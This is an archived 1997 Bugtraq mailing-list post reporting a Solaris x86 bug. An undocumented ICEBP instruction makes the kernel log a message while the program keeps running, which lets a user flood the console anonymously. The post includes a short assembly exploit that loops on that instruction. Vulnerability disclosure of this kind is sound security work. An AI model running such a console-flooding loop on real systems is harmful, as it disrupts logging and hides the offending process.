[5623] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Solaris x86 & ICEBP

daemon@ATHENA.MIT.EDU (Solar Designer)
Sat Nov 15 21:12:15 1997

Date: 	Sun, 16 Nov 1997 03:25:20 -0300
Reply-To: Solar Designer <solar@FALSE.COM>
From: Solar Designer <solar@FALSE.COM>
To: BUGTRAQ@NETSPACE.ORG

Hello,

This Pentium bug workaround discussion reminded me of a minor Solaris x86
bug I found half a year ago (tested on Solaris 2.5).

When a program executes the originally undocumented ICEBP instruction, the
kernel reports an 'Unexpected INT 1', and the program continues running.
With default syslogd configuration, this allows flooding the console, and
no information about which process is doing this is reported.

Here's the exploit (put in a .s file):

.globl main
main:
.byte 0xf1
jmp main

Signed,
Solar Designer


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[5623] in bugtraq

Solaris x86 & ICEBP

daemon@ATHENA.MIT.EDU (Solar Designer)Sat Nov 15 21:12:15 1997

daemon@ATHENA.MIT.EDU (Solar Designer)
Sat Nov 15 21:12:15 1997